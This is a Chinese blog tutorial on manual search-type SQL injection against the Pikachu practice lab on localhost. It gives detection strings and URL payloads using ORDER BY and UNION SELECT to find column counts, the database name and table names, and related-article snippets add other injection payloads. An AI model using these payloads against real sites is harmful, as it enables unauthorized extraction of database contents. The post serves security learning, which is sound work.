mysql搜索型注入_pikachu-搜索型注入 #手工注入

最新推荐文章于 2024-05-15 23:16:18 发布
最新推荐文章于 2024-05-15 23:16:18 发布
阅读量334 收藏
点赞数 1
文章标签: mysql搜索型注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28745525/article/details/114860661
版权

1.搜索型注入漏洞产生的原因:

在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索型注入漏洞,又称文本框注入。

2.搜索型注入的类型:

同其他注入类型相同,由于提交表单的不同,可分为GET型(多出现于网站上的搜索)和POST型(多出现于用户名的登录搜索匹配),搜索型注入是国内系统中普遍存在的漏洞。

3.原理分析:

select username,id,email from member where username like '%$name%'

这句SLQ语句就是基于用户输入的name的值在表member中搜索匹配username,但是如果输入 'and 1=1 and'%'=' 就变成了

select username,id,email from member where username like '%$name'and 1=1 and '%'='%'

就存在了SQL注入。

4.搜索型注入的判断方法:

1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;

2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;

3 搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况

4 搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况

5 根据两次的返回情况来判断是不是搜索型文本框注入了

下面方法也可以测试

'and 1=1 and '%'='

%' and 1=1--'

%' and 1=1 and '%'='

实例讲解:

源码:

a5119ff044b3502d7c522ca7abd054f5.png

一,猜字段

可判断有三个字段

http://127.0.0.1/pikachu-master/vul/sqli/sqli_search.php?name= ' order by 3 --+&submit=æç´¢

130e4a6c3518751c77a355a27b2f9ffc.png

二,爆字段

http://127.0.0.1/pikachu-master/vul/sqli/sqli_search.php?name= ' UNION SELECT 1,2,3 --+&submit=æç´¢

6ae3737c780c067ceb51c4ef7a79db0f.png

三,爆库

http://127.0.0.1/pikachu-master/vul/sqli/sqli_search.php?name= ' UNION SELECT 1,2,database() --+&submit=æç´¢

1fa449bd490a2b48153baec45b1375b6.png

四,爆表

0cb05b30b9f3b0b23d7a6c3997e33e92.png

五,爆列

742613146e31360875a571a241d5a233.png

六,爆字段内容

bee83af588f2b537aae04122ad55d21d.png

其他方式

(1)猜字段数

可以判断字段数为 3

127.0.0.1/pikachu-master/vul/sqli/sqli_search.php?name= %' union select 1,2,3,4 and '%'='&submit=搜索 #报错

127.0.0.1/pikachu-master/vul/sqli/sqli_search.php?name= %' union select 1,2,3 and '%'='&submit=搜索 #不报错

127.0.0.1/pikachu-master/vul/sqli/sqli_search.php?name= %' union select 1,2 and '%'='&submit=搜索 #报错

76dd4b81f3b2b50f832e25daa2d61b89.png

(2)猜表

127.0.0.1/pikachu-master/vul/sqli/sqli_search.php?name= %'and(select count(*)from users)>0 and '%'='&submit=搜索

更换users,不报错就证明数据库中含有这个表

13cb1d070feb30ef04d2ac0e9240fd3a.png

9c9f94f4a0ae43d96b5860537d6a87c5.png

血管瘤专家孔强
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Pikachu搜索注入
xdjxi的博客
03-07 845
一、原理 “%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。 构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下 xxxx%’ or 1=1# 二、操作 打开进入界面: 然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数,时返回了正常页面然后我们可以输入’ and 1...
pikachu-master.zip
06-25
Pikachu靶场:全面理解与提升网络安全技能》 "Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让...
Xss基础
weixin_62693307的博客
02-23 389
检测关键字(还是和编码绕过一样,但后台源码中加入了其他的东西,例如strpos函数,这个意思是输入的字符串里面必须要有某些特定的字符(http://)而我们可以把它加上在注释掉就行了)通过广撒网或者其它指定的方式,将存储xss放在具有xss漏洞的网站上,只要有用户去点击,即可进行攻击,也可以自己去找寻攻击对象,所以攻击范围更广。Xss攻击盗取web终端用户的敏感数据,甚至控制用户终端操作;Xss和sql注入攻击的指令都是由黑客通过用户输入域注入的,但xss注入的是html,而sql注入的是sql命令。
记一次搜索注入
super_m@n的博客
01-09 574
1.起因 还是和往常一样,看见index.php?id=1这样的界面顺手就想来个and 1=1 ,结果没反应,试试其他的大小写 内联注释 多次编码注入均失败,我望着页面的无效参数陷入了深思,难道这个网站真的没有一丝可以利用的地方,我告诉自己不可能,肯定是自己能力不够还不足以发现页面的漏洞,既然sql不行那就找找xss csrf等漏洞,皇天不负有心人,在搜索框输入"><img src=...
SQL注入常见类注入点的判断
最新发布
qq_64395221的博客
05-15 870
字符注入的时候我们需要逃逸单引号,但是php提供了魔术引号开关magic_quotes_gpc和addslashes(),iconv()函数作为防御,特点是自动给传入的参数如单引号,双引号,反斜杠,%00前面加一个反斜杠,进行转义,避免单引号进行逃逸。id=1这种形式的url,这个时候我们输入and 1=1与and 1=2,进行判定看是否会出现and 1=1回显正常,and 1=2回显不正常的情况。sql语句的变量并不是直接传入的变量,而是通过其它的方式保存到了数据库,形成二次注入
SQL注入搜索注入
qxx5203的博客
07-22 2594
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字还是字符。账号密码错误或用户未注册!搜索框内输入a正常回显。...
SQL注入(二):字符+搜索+ XX+insert/update
NSQ0207的博客
07-19 373
1、使用 ' 进行测试2、使用order by 测试有几个字段3、使用union select 1,2 查看字段。
Juego_Pikachu-master.rar
10-09
《基于Pikachu的游戏开发源码解析》 在IT行业中,源码是理解软件工作原理的最直接方式,尤其对于游戏开发来说,源码更是学习和提升编程技能的重要资源。"Juego_Pikachu-master"这个项目,显然是一个与皮卡丘相关的...
PyPI 官网下载 | gym_pikachu_volleyball-0.0.1.tar.gz
01-12
《PyPI官网下载:探索gym_pikachu_volleyball-0.0.1.tar.gz中的Python库知识》 PyPI(Python Package Index)是Python开发者的重要资源库,它提供了无数的开源Python库,便于开发者们下载和安装。在本文中,我们将...
sql注入 pikachu post数字注入
08-12
SQL 注入 Pikachu Post 数字注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字注入方法,即使用 ...
pokemon-detective-pikachu_arabic-1996226_cxbdfh_Detective_
10-03
【标题】"pokemon-detective-pikachu_arabic-1996226_cxbdfh_Detective_" 暗示了这是一个与《名侦探皮卡丘》(Detective Pikachu)相关的资源,可能是一部电影或动画的阿拉伯语版本。"arabic" 表明内容是阿拉伯语...
搜索框——不能忽视的XSS漏洞搜索框所引起的XSS漏洞
06-12
我刚入行的时候做过一个小小的页面工具,其中有一个步骤是把一些代码输出到页面上,当时我用的是php做的,写了个for循环,读取每一行的内容,然后echo出来。但是我发现页面排版老是那么的乱,怎么缩进都没有了?有一些代码还显示不出来?这太让我纳闷了,于是问一个学长是怎么一回事,他说:“当然啦,你输出的内容被浏览器解释过后的样子就是这样子的了,比如说你的空格浏览器是不承认的,你要输出空格就得用nbsp; ……”这时我才反应过来:“哦,原来如此……”。那时我才知道,在html的输出上代码和内容还是得程序员自己去区分的。
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4916
sql注入详解
pikachu之特殊注入搜索注入、xx注入、insert/update注入、delete注入、宽字节注入
2301_80661529的博客
03-02 1220
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。
新手上路 关于SQL注入中的搜索的一些基础知识
young‘s blog
08-10 637
搜索注入,这是个什么东西,一起来看看 % 通配符 %key 可以匹配到okkey iskey key% 可以匹配到keyok keyii %key% 全能选手~ information_schme 里面的tables表中存放着库名对应表名 Select * from users where title =’33%(这里要找一个不存在的,否则后面显示不出来)’ union se...
mysql 搜索注入_mysql+php搜索注入问题记录
weixin_29090089的博客
01-27 150
http://xxx.com/search.php?dy=a%' and 1=1-- 错误 http://xxx.com/search.php?dy=a%' and 1=2-- 错误 http://xxx.com/search.php?dy=a%' and 1=1 and '%'=' 正常 http://xxx.com/search.php?dy=a%' and 1=2 and '%'='...
常见的SQL注入
热门推荐
weixin_49182737的博客
05-22 1万+
sql注入的基本分类
sql盲注之报错注入(附自动化脚本)
dfdhxb995397的博客
12-29 849
作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。 1. Dupli...
pikachu靶场xx注入
08-30
pikachu靶场中的XX注入是指在进行数据库注入漏洞测试时,通过查询pikachu数据库中的users表来获取表项的信息。具体步骤如下: 1. 首先,进行注入点的探测,通过使用order by语句来试探查询语句所用的列名个数。 2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值